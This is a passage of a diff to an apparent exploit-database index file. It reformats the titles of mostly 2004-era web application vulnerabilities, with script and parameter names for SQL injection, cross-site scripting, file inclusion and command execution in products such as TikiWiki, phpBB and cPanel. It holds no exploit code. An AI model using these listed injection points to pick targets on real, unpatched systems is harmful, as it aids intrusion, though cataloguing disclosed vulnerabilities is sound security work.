'newmultiplechoice.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - '/glossaries/index.php' File Parameter Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 - readings/index.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 - resultsignore.php Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 -23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - error.asp Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 +23725,platforms/php/webapps/23725.txt,"Fool's Workshop Owl's Workshop 1.0 - '/glossaries/index.php?File' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23726,platforms/php/webapps/23726.txt,"Fool's Workshop Owl's Workshop 1.0 - 'readings/index.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23727,platforms/php/webapps/23727.txt,"Fool's Workshop Owl's Workshop 1.0 - 'resultsignore.php' Arbitrary File Access",2004-02-18,G00db0y,php,webapps,0 +23729,platforms/asp/webapps/23729.txt,"WebCortex WebStores2000 - 'error.asp' Cross-Site Scripting",2004-02-18,"Nick Gudov",asp,webapps,0 23742,platforms/php/webapps/23742.txt,"phpNewsManager 1.36 - functions Script File Disclosure",2004-02-23,G00db0y,php,webapps,0 23744,platforms/php/webapps/23744.txt,"EZBoard 7.3 - Font Tag HTML Injection",2004-02-23,"Cheng Peng Su",php,webapps,0 23745,platforms/php/webapps/23745.txt,"XMB Forum 1.8 - 'u2uadmin.php?uid' Cross-Site Scripting",2004-02-23,"Janek Vind",php,webapps,0 @@ -27383,35 +27384,35 @@ id,file,description,date,author,platform,type,port 23773,platforms/php/webapps/23773.txt,"IGeneric Free Shopping Cart 1.4 - Cross-Site Scripting",2004-03-01,"David Sopas Ferreira",php,webapps,0 23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0 23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple SQL Injections",2004-03-01,"Alnitak and BackSpace",php,webapps,0 -23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 +23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php?posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0 23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - 'blocker_query.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 23791,platforms/asp/webapps/23791.txt,"SpiderSales 2.0 Shopping Cart - Multiple Vulnerabilities",2004-03-03,"Nick Gudov",asp,webapps,0 23792,platforms/php/webapps/23792.txt,"VirtuaSystems VirtuaNews 1.0.x (Multiple Modules) - Cross-Site Scripting",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 -23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - Pop Parameter Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 -23797,platforms/php/webapps/23797.txt,"Confixx 2 - DB Parameter SQL Injection",2004-03-09,wkr,php,webapps,0 +23795,platforms/php/webapps/23795.txt,"Invision Power Board 1.3 - 'Pop' Cross-Site Scripting",2004-03-09,"Rafel Ivgi The-Insider",php,webapps,0 +23797,platforms/php/webapps/23797.txt,"Confixx 2 - 'DB' SQL Injection",2004-03-09,wkr,php,webapps,0 23798,platforms/php/webapps/23798.txt,"Confixx 2 - Perl Debugger Remote Command Execution",2004-03-09,wkr,php,webapps,0 40402,platforms/php/webapps/40402.pl,"VegaDNS 0.13.2 - Remote Command Injection",2016-09-20,Wireghoul,php,webapps,0 -23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 +23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 - 'dir' Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 - nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 - 'emumail.fcgi' Multiple Cross-Site Scripting Vulnerabilities",2004-03-12,dr_insane,cgi,webapps,0 23812,platforms/php/webapps/23812.txt,"YABB SE 1.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-15,"Cheng Peng Su",php,webapps,0 23813,platforms/asp/webapps/23813.txt,"VocalTec VGW4/8 Telephony Gateway - Remote Authentication Bypass",2004-03-15,"Rafel Ivgi The-Insider",asp,webapps,0 -23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - fname Parameter Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 +23814,platforms/php/webapps/23814.txt,"PHP-Nuke 7.1 Recommend_Us Module - 'fname' Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 23815,platforms/php/webapps/23815.txt,"WarpSpeed 4nAlbum Module 0.92 - 'displaycategory.php?basepath' Remote File Inclusion",2004-03-15,"Janek Vind",php,webapps,0 23816,platforms/php/webapps/23816.txt,"WarpSpeed 4nAlbum Module 0.92 - 'modules.php?gid' SQL Injection",2004-03-15,"Janek Vind",php,webapps,0 23817,platforms/php/webapps/23817.txt,"WarpSpeed 4nAlbum Module 0.92 - 'nmimage.php?z' Cross-Site Scripting",2004-03-15,"Janek Vind",php,webapps,0 -23818,platforms/php/webapps/23818.txt,"Phorum 3.x - register.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 +23818,platforms/php/webapps/23818.txt,"Phorum 3.x - 'register.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23819,platforms/php/webapps/23819.txt,"Phorum 3.x - 'login.php' HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x - 'profile.php?target' Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23821,platforms/php/webapps/23821.php,"phpBB 1.x/2.0.x - 'search.php?search_results' SQL Injection",2004-01-04,pokleyzz,php,webapps,0 23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - 'forumdisplay.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - 'showthread.php' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2004-03-16,JeiAr,php,webapps,0 -23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php?mos_change_template' Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Arbitrary JavaScript Execution (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0 23829,platforms/php/webapps/23829.txt,"e107 1.0.2 - SQL Injection (via Cross-Site Request Forgery)",2013-01-02,"Joshua Reynolds",php,webapps,0 23831,platforms/php/webapps/23831.py,"Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution",2013-01-02,xistence,php,webapps,0 @@ -27431,11 +27432,11 @@ id,file,description,date,author,platform,type,port 23860,platforms/asp/webapps/23860.txt,"Expinion.net News Manager Lite 2.5 - 'more.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23861,platforms/asp/webapps/23861.txt,"Expinion.net News Manager Lite 2.5 - 'category_news.asp?ID' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - 'news_sort.asp?filter' SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 -23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie Admin Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 +23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - 'NEWS_LOGIN?admin' Cookie Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - 'private.php' Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injections",2004-03-23,JeiAr,php,webapps,0 -23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 +23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - 'id' SQL Injection",2004-03-22,JeiAr,php,webapps,0 23869,platforms/php/webapps/23869.txt,"PHP-Nuke MS-Analysis Module - Multiple Cross-Site Scripting Vulnerabilities",2004-03-22,"Janek Vind",php,webapps,0 23870,platforms/php/webapps/23870.txt,"PHP-Nuke MS-Analysis Module - HTTP Referrer Field SQL Injection",2004-03-22,"Janek Vind",php,webapps,0 23872,platforms/jsp/webapps/23872.txt,"reget deluxe 3.0 build 121 - Directory Traversal",2004-03-22,snifer,jsp,webapps,0 @@ -27453,16 +27454,16 @@ id,file,description,date,author,platform,type,port 23901,platforms/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",php,webapps,0 23907,platforms/cgi/webapps/23907.pl,"Aborior Encore Web Forum - Arbitrary Command Execution",2004-04-03,K-159,cgi,webapps,0 23908,platforms/php/webapps/23908.txt,"OpenBB 1.0.6 - 'myhome.php' SQL Injection",2004-04-05,"Mark Tesn",php,webapps,0 -23913,platforms/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - index.fts folder Parameter Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps,0 +23913,platforms/cgi/webapps/23913.txt,"FloosieTek FTGate Mail Server 1.2 - 'index.fts?folder' Cross-Site Scripting",2004-04-06,dr_insane,cgi,webapps,0 23914,platforms/cgi/webapps/23914.txt,"FloosieTek FTGate Mail Server 1.2 - Full Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 23924,platforms/multiple/webapps/23924.txt,"Nexpose Security Console - Cross-Site Request Forgery",2013-01-06,"Robert Gilbert",multiple,webapps,0 -23928,platforms/php/webapps/23928.txt,"NukeCalendar 1.1.a - modules.php Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 -23929,platforms/php/webapps/23929.txt,"NukeCalendar 1.1.a - block-calendar.php Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 -23930,platforms/php/webapps/23930.txt,"NukeCalendar 1.1.a - block-Calendar1.php Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 -23931,platforms/php/webapps/23931.txt,"NukeCalendar 1.1.a - block-Calendar_center.php Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 -23932,platforms/php/webapps/23932.txt,"NukeCalendar 1.1.a - eid Parameter Cross-Site Scripting",2004-04-08,"Janek Vind",php,webapps,0 -23933,platforms/php/webapps/23933.txt,"NukeCalendar 1.1.a - eid Parameter SQL Injection",2004-04-08,"Janek Vind",php,webapps,0 -23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 - 'index.php' language Parameter Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 +23928,platforms/php/webapps/23928.txt,"NukeCalendar 1.1.a - 'modules.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 +23929,platforms/php/webapps/23929.txt,"NukeCalendar 1.1.a - 'block-calendar.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 +23930,platforms/php/webapps/23930.txt,"NukeCalendar 1.1.a - 'block-Calendar1.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 +23931,platforms/php/webapps/23931.txt,"NukeCalendar 1.1.a - 'block-Calendar_center.php' Full Path Disclosure",2004-04-08,"Janek Vind",php,webapps,0 +23932,platforms/php/webapps/23932.txt,"NukeCalendar 1.1.a - 'eid' Cross-Site Scripting",2004-04-08,"Janek Vind",php,webapps,0 +23933,platforms/php/webapps/23933.txt,"NukeCalendar 1.1.a - 'eid' SQL Injection",2004-04-08,"Janek Vind",php,webapps,0 +23934,platforms/php/webapps/23934.txt,"AzDGDatingLite 2.1.1 - 'index.php?language' Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 23935,platforms/php/webapps/23935.txt,"AzDGDatingLite 2.1.1 - 'view.php?id' Cross-Site Scripting",2004-04-07,"Janek Vind",php,webapps,0 23937,platforms/cgi/webapps/23937.txt,"1st Class Mail Server 4.0 1 - viewmail.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23938,platforms/cgi/webapps/23938.txt,"1st Class Mail Server 4.0 1 - Index Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 @@ -27470,7 +27471,7 @@ id,file,description,date,author,platform,type,port 23940,platforms/cgi/webapps/23940.txt,"1st Class Mail Server 4.0 1 - general.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz Cross-Site Scripting",2004-04-08,dr_insane,cgi,webapps,0 -23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php' theme Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - 'tiki-switch_theme.php?theme' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 23948,platforms/php/webapps/23948.txt,"TikiWiki Project 1.8 - 'img/wiki_up' Arbitrary File Upload",2004-04-12,JeiAr,php,webapps,0 23949,platforms/php/webapps/23949.txt,"TikiWiki Project 1.8 - 'tiki-map.phtml' Traversal Arbitrary File / Directory Enumeration",2004-04-12,JeiAr,php,webapps,0 23950,platforms/php/webapps/23950.txt,"TikiWiki Project 1.8 - User Profile Multiple Option Remote Code Injections",2004-04-12,JeiAr,php,webapps,0 @@ -27478,16 +27479,16 @@ id,file,description,date,author,platform,type,port 23952,platforms/php/webapps/23952.txt,"TikiWiki Project 1.8 - 'categorize.php' Direct Request Full Path Disclosure",2004-04-12,JeiAr,php,webapps,0 23953,platforms/php/webapps/23953.txt,"TikiWiki Project 1.8 - 'messu-mailbox.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps,0 23954,platforms/php/webapps/23954.txt,"TikiWiki Project 1.8 - 'messu-read.php' Multiple Cross-Site Scripting Vulnerabilities",2004-04-12,JeiAr,php,webapps,0 -23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php' articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php' parentId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php' comments_threshold Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - 'tiki-print_article.php' articleId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - 'tiki-upload_file.php' galleryID Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - 'tiki-view_faq.php' faqId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php' chartId Parameter Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 -23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php' sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23955,platforms/php/webapps/23955.txt,"TikiWiki Project 1.8 - 'tiki-read_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23956,platforms/php/webapps/23956.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?parentId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23957,platforms/php/webapps/23957.txt,"TikiWiki Project 1.8 - 'tiki-index.php?comments_threshold' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23958,platforms/php/webapps/23958.txt,"TikiWiki Project 1.8 - 'tiki-print_article.php?articleId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23959,platforms/php/webapps/23959.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23960,platforms/php/webapps/23960.txt,"TikiWiki Project 1.8 - 'tiki-upload_file.php?galleryID' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23961,platforms/php/webapps/23961.txt,"TikiWiki Project 1.8 - 'tiki-view_faq.php?faqId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23962,platforms/php/webapps/23962.txt,"TikiWiki Project 1.8 - 'tiki-view_chart.php?chartId' Cross-Site Scripting",2004-04-12,JeiAr,php,webapps,0 +23963,platforms/php/webapps/23963.txt,"TikiWiki Project 1.8 - 'tiki-usermenu.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 +23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - 'tiki-list_file_gallery.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - 'tiki-directory_ranking.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - 'tiki-browse_categories.php?sort_mode' SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,cr4wl3r,php,webapps,0 @@ -27525,17 +27526,17 @@ id,file,description,date,author,platform,type,port 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x - Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 24026,platforms/php/webapps/24026.txt,"phpBB 2.0.x - 'album_portal.php' Remote File Inclusion",2004-04-19,Officerrr,php,webapps,0 24034,platforms/php/webapps/24034.txt,"PHProfession 2.5 - 'modules.php?offset' SQL Injection",2004-04-23,"Janek Vind",php,webapps,0 -24035,platforms/php/webapps/24035.txt,"PHProfession 2.5 - upload.php Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 +24035,platforms/php/webapps/24035.txt,"PHProfession 2.5 - 'upload.php' Direct Request Full Path Disclosure",2004-04-23,"Janek Vind",php,webapps,0 24036,platforms/php/webapps/24036.txt,"PHProfession 2.5 - 'modules.php?jcode' Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - 'openwindow.php?hlpfile' Cross-Site Scripting",2004-04-21,"Janek Vind",php,webapps,0 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 24044,platforms/php/webapps/24044.txt,"PHPLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 -24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 -24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 +24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - 'Ver.asp' Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 +24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - 'Password' SQL Injection",2004-04-23,JQ,php,webapps,0 24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - 'member.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - 'myhome.php?to' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24054,platforms/php/webapps/24054.txt,"OpenBB 1.0.x - 'post.php?TID' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 -24055,platforms/php/webapps/24055.txt,"OpenBB 1.0.x - 'index.php' redirect Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 +24055,platforms/php/webapps/24055.txt,"OpenBB 1.0.x - 'index.php?redirect' Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24056,platforms/php/webapps/24056.txt,"OpenBB 1.0.x - 'board.php?FID' SQL Injection",2004-04-26,JeiAr,php,webapps,0 24057,platforms/php/webapps/24057.txt,"OpenBB 1.0.x - 'member.php' Multiple SQL Injections",2004-04-26,JeiAr,php,webapps,0 24058,platforms/php/webapps/24058.txt,"OpenBB 1.0.x - 'search.php?q' SQL Injection",2004-04-26,JeiAr,php,webapps,0 @@ -27548,10 +27549,10 @@ id,file,description,date,author,platform,type,port 24073,platforms/php/webapps/24073.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'startdir' Traversal Arbitrary File Access",2004-04-30,"Janek Vind",php,webapps,0 24074,platforms/php/webapps/24074.txt,"Coppermine Photo Gallery 1.2.0 RC4 - 'init.inc.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 24075,platforms/php/webapps/24075.txt,"Coppermine Photo Gallery 1.2.2b - 'theme.php' Remote File Inclusion",2004-04-30,"Janek Vind",php,webapps,0 -24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - AddUser.cfm Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 +24081,platforms/cfm/webapps/24081.txt,"E-Zone Media FuzeTalk 2.0 - 'AddUser.cfm' Administrator Command Execution",2004-05-05,"Stuart Jamieson",cfm,webapps,0 24082,platforms/php/webapps/24082.txt,"Simple Machines Forum (SMF) 1.0 - Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 -24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go Parameter) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 +24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - 'go' Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 - Full Path Disclosure / Persistent Cross-Site Scripting",2013-01-13,LiquidWorm,php,webapps,0 24088,platforms/php/webapps/24088.txt,"PHPX 3.x - '/page.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24089,platforms/php/webapps/24089.txt,"PHPX 3.x - '/news.php' Cross-Site Request Forgery / Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 @@ -27569,7 +27570,7 @@ id,file,description,date,author,platform,type,port 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - 'Modpath' File Inclusion",2004-05-17,waraxe,php,webapps,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 24134,platforms/php/webapps/24134.txt,"CMS snews - SQL Injection",2013-01-15,"By onestree",php,webapps,0 -24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - Log.php HTML Injection",2004-05-21,Chinchilla,php,webapps,0 +24138,platforms/php/webapps/24138.txt,"e107 Website System 0.5/0.6 - 'Log.php' HTML Injection",2004-05-21,Chinchilla,php,webapps,0 24139,platforms/jsp/webapps/24139.txt,"Liferay Enterprise Portal 1.x/2.x/5.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-05-22,"Sandeep Giri",jsp,webapps,0 24151,platforms/php/webapps/24151.txt,"jPORTAL 2.2.1 - 'print.php' SQL Injection",2004-05-28,"Maciek Wierciski",php,webapps,0 24152,platforms/php/webapps/24152.txt,"Land Down Under - BBCode HTML Injection",2004-05-29,"Tim De Gier",php,webapps,0 @@ -27582,22 +27583,22 @@ id,file,description,date,author,platform,type,port 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 -24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 +24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion",2004-06-03,"The Warlock [BhQ]",php,webapps,0 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0 24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 -24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 +24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 - 'Next_file' File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 24176,platforms/php/webapps/24176.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Error Message Full Path Disclosure",2004-06-07,"Donnie Werner",php,webapps,0 24177,platforms/php/webapps/24177.txt,"NetWin Surgemail 1.8/1.9/2.0 / WebMail 3.1 - Login Form Cross-Site Scripting",2004-06-07,"Donnie Werner",php,webapps,0 24180,platforms/php/webapps/24180.txt,"Invision Gallery 2.0.5 - SQL Injection",2013-01-17,"Ashiyane Digital Security Team",php,webapps,0 24183,platforms/php/webapps/24183.txt,"cPanel 5-9 - Passwd SQL Injection",2004-06-09,verb0s@virtualnova.net,php,webapps,0 24184,platforms/asp/webapps/24184.txt,"AspDotNetStorefront 3.3 - Access Validation",2004-06-09,"Thomas Ryan",asp,webapps,0 -24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - ReturnURL Parameter Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps,0 -24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module - categories Parameter Cross-Site Scripting",2004-06-11,"Janek Vind",java,webapps,0 +24185,platforms/asp/webapps/24185.txt,"AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting",2004-06-09,"Thomas Ryan",asp,webapps,0 +24190,platforms/java/webapps/24190.txt,"PHP-Nuke 6.x/7.x FAQ Module - 'categories' Cross-Site Scripting",2004-06-11,"Janek Vind",java,webapps,0 24191,platforms/php/webapps/24191.txt,"PHP-Nuke 6.x/7.x Encyclopedia Module - Multiple Function Cross-Site Scripting Vulnerabilities",2004-06-11,"Janek Vind",php,webapps,0 -24192,platforms/php/webapps/24192.txt,"PHP-Nuke 6.x/7.x Reviews Module - order Parameter SQL Injection",2004-06-11,"Janek Vind",php,webapps,0 